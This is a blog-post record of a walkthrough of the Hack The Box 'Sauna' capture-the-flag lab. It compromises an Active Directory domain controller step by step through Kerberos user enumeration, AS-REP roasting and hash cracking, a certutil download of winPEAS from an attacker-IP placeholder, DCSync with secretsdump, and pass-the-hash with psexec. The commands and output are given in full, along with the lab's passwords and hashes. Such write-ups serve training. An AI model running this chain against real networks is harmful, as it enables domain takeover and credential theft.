{
  "$type": "site.standard.document",
  "bskyPostRef": {
    "cid": "bafyreieknljckr6wjx2urbaqdahcgsrqoescn37sfbetbogrebnwm6bboe",
    "uri": "at://did:plc:25rdn5elo5izoxrmtis34zuk/app.bsky.feed.post/3mpt7xabzor32"
  },
  "coverImage": {
    "$type": "blob",
    "ref": {
      "$link": "bafkreig2ml7l4mfek7n4qfdq5of6yvf3dciv3r4ce7giyncpyv4ygwez4a"
    },
    "mimeType": "image/webp",
    "size": 101898
  },
  "path": "/iftikhar_911/sauna-ctf-htb-1lp0",
  "publishedAt": "2026-07-04T13:29:19.000Z",
  "site": "https://dev.to",
  "tags": [
    "ctf",
    "redteam",
    "cybersecurity",
    "@10",
    "https://setuptools.pypa.io/en/latest/pkg_resources.html",
    "@ropnop"
  ],
  "textContent": "Hi what’s up, welcome to my page. Today we are going to solve Sauna ctf in Hack The box. This ctf is about Active Directory, which is very important.\n\n**Enumeration**\n`nmap -sV -sC 10.129.95.180\nStarting Nmap 7.98 ( https://nmap.org ) at 2026–07–03 13:16 -0400\nNmap scan report for 10.129.95.180\nHost is up (0.21s latency).\nNot shown: 987 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n53/tcp open domain Simple DNS Plus\n80/tcp open http Microsoft IIS httpd 10.0\n|_http-server-header: Microsoft-IIS/10.0\n|_http-title: Egotistical Bank :: Home\n| http-methods:\n|_ Potentially risky methods: TRACE\n88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026–07–04 00:16:58Z)\n135/tcp open msrpc Microsoft Windows RPC\n139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)\n445/tcp open microsoft-ds?\n464/tcp open kpasswd5?\n593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0\n636/tcp open tcpwrapped\n3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)\n3269/tcp open tcpwrapped\n5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)\n|_http-server-header: Microsoft-HTTPAPI/2.0\n|_http-title: Not Found\nService Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows\nHost script results:\n| smb2-time:\n| date: 2026–07–04T00:17:20\n|_ start_date: N/A\n|_clock-skew: 6h59m50s\n| smb2-security-mode:\n| 3.1.1:\n|_ Message signing enabled and required`\nAs we can see, we have LDAP, evil-winrm, smb,http, rpc and many more ports.\n\n**RPC port**\n\n`rpcclient -U \"\" -N 10.129.95.180\nrpcclient $> enumdomusers\nresult was NT_STATUS_ACCESS_DENIED\nrpcclient $> ^C`\nWe can’t use rpc port without authentication.\n\n**SMB port**\n\n\n\n    `smbclient -L //10.129.95.180\n    Password for [WORKGROUP\\root]:\n    Anonymous login successful\n    Sharename Type Comment\n     - - - - - - - - - - -\n    Reconnecting with SMB1 for workgroup listing.\n    do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\n    Unable to connect with SMB1 - no workgroup available`\n\n\nSame thing.\n\n**LDAP**\nWe have port 88 and 636. That’s why we can use ldapsearch for domain enumeration. Let’s start it.\n\n\n\n    `ldapsearch -x -H ldap://10.129.95.180 -s base -b \"\" \"(objectClass=*)\" namingContexts\n    # extended LDIF\n    # extended LDIF\n    #\n    # LDAPv3\n    # base <> with scope baseObject\n    # filter: (objectClass=*)\n    # requesting: namingContexts\n    #\n\n    #\n    dn:\n    namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL\n    namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL\n    namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL\n    namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL\n    namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL\n\n    # search result\n    search: 2\n    result: 0 Success\n\n    # numResponses: 2\n    # numEntries: 1`\n\n\nDomain Controller- egotistical-bank.local. And there are no interesting things.\n\n**KERBEROS**\nPort 88 is active, we can use kerbrute tool for enumerate authenticated users. I’m using seclist for usernames but you can use any userlist txt.\n\n\n\n    ./kerbrute userenum -d egotistical-bank.local --dc 10.129.95.180 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt\n\n        __             __               __\n       / /_____  _____/ /_  _______  __/ /____\n      / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\\n     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/\n    /_/|_|\\___/_/  /_.___/_/   \\__,_/\\__/\\___/\n\n    Version: v1.0.3 (9dad6e1) - 07/03/26 - Ronnie Flathers @ropnop\n\n    2026/07/03 13:31:29 >  Using KDC(s):\n    2026/07/03 13:31:29 >   10.129.95.180:88\n\n    2026/07/03 13:32:09 >  [+] VALID USERNAME:       administrator@egotistical-bank.local\n    2026/07/03 13:35:45 >  [+] VALID USERNAME:       hsmith@egotistical-bank.local\n    2026/07/03 13:36:30 >  [+] VALID USERNAME:       Administrator@egotistical-bank.local\n    2026/07/03 13:38:47 >  [+] VALID USERNAME:       fsmith@egotistical-bank.local\n    2026/07/03 13:58:42 >  [+] VALID USERNAME:       Fsmith@egotistical-bank.local\n\n\nWe found 3 users.\n\n**AES-ROASTING**\nFor these users, we can use impacket script called GetNPUusers.py. This script allowed us to find hashes.\n\n\n\n     GetNPUsers.py 'egotistical-bank.local/' -usersfile /home/kali/Downloads/sauna.txt -format hashcat -outputfile saunaasrep.txt -dc-ip 10.129.95.180\n    /usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html\n      __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetNPUsers.py')\n    Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies\n\n    [-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set\n    [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set\n    $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd\n\n\nWe got fsmith’s hash.\n\n**Cracking the hash**\nHashcat help us to crack this hash.\n\n`hashcat -m 18200 saunaasrep.txt /usr/share/wordlists/rockyou.txt --force\n$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd:Thestrokes23`\nWe found fsmith’s password.\n\n**Gaining access to evil-winrm | PORT 5985**\n\n\n\n    evil-winrm -i <ip> -u <username> -p <password>\n\n    evil-winrm -i 10.129.95.180 -u fsmith -p Thestrokes23\n\n    Evil-WinRM shell v3.9\n\n\n\n    Info: Establishing connection to remote endpoint\n    *Evil-WinRM* PS C:\\Users\\FSmith> cd Desktop\n    *Evil-WinRM* PS C:\\Users\\FSmith\\Desktop> dir\n\n\n        Directory: C:\\Users\\FSmith\\Desktop\n\n\n    Mode                LastWriteTime         Length Name\n    ----                -------------         ------ ----\n    -ar---         7/3/2026   5:14 PM             34 user.txt\n\n\n\n    *Evil-WinRM* PS C:\\Users\\FSmith\\Desktop> type user.txt\n    *******\n\n\nWe got user.txt in desktop directory.\n\n**Privilege Escalation**\nFirstly,we should upload winpeas on the victim machine for privilege escalation methods.\n\nOn attacker machine\n\nMake sure you are supposed to be in directory which has winpeas inside.\n\n`python3 -m http.server 80`\nOn victim machine\n\n`certutil -urlcache -split -f http://<ATTACKER_IP>:80/winPEAS.exe winPEAS.exe`\nWe can run winpeas with .\\winpeas.exe\n\n\n\n    Looking for AutoLogon credentials\n        Some AutoLogon credentials were found\n        DefaultDomainName             :  EGOTISTICALBANK\n        DefaultUserName               :  EGOTISTICALBANK\\svc_loanmanager\n        DefaultPassword               :  Moneymakestheworldgoround!\n\n\nAnd there it is autologon user:svc_loanmanager\n\n**BloodHound**\n\nTake a look at bloodhound,and we can understood what loanmanager can do. loanmanager have 3 permissions: GetChangesAll, DCSync, GetChanges.\n\nWe use secretsdump for administrator hash.\n\n`\n\n```console\n`console\n`secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'\n/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html\n**import**('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'secretsdump.py')\nImpacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies\n\n[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied\n[_] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n[_] Using the DRSUAPI method to get NTDS.DIT secrets\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::\n```\n\n```\nHash has been found but firstly we should make sure that we can login with this hash. So we use crackmapexec for prove.\n\n`crackmapexec smb 10.129.95.180 -u 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e\nSMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)\nSMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\\Administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)\n`Yeppp, we can use this hash for login!\n\n**ROOT FLAG**\n\n`>`impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.129.95.180 Administrator@10.129.95.180\n\n> C:\\Users> cd Administrator\n>\n> C:\\Users\\Administrator> cd Desktop\n>\n> C:\\Users\\Administrator\\Desktop> dir\n>  Volume in drive C has no label.\n>  Volume Serial Number is 489C-D8FC\n>  Directory of C:\\Users\\Administrator\\Desktop\n>  07/14/2021 03:35 PM\n>\n> .\n>  07/14/2021 03:35 PM ..\n>  07/03/2026 05:14 PM 34 root.txt\n>  1 File(s) 34 bytes\n>  2 Dir(s) 7,812,263,936 bytes free\n>  C:\\Users\\Administrator\\Desktop> type root.txt\n>  *********``\n>  BINGOOO!!!! We got root flag. Stay safe and goodbye.",
  "title": "Sauna CTF HTB"
}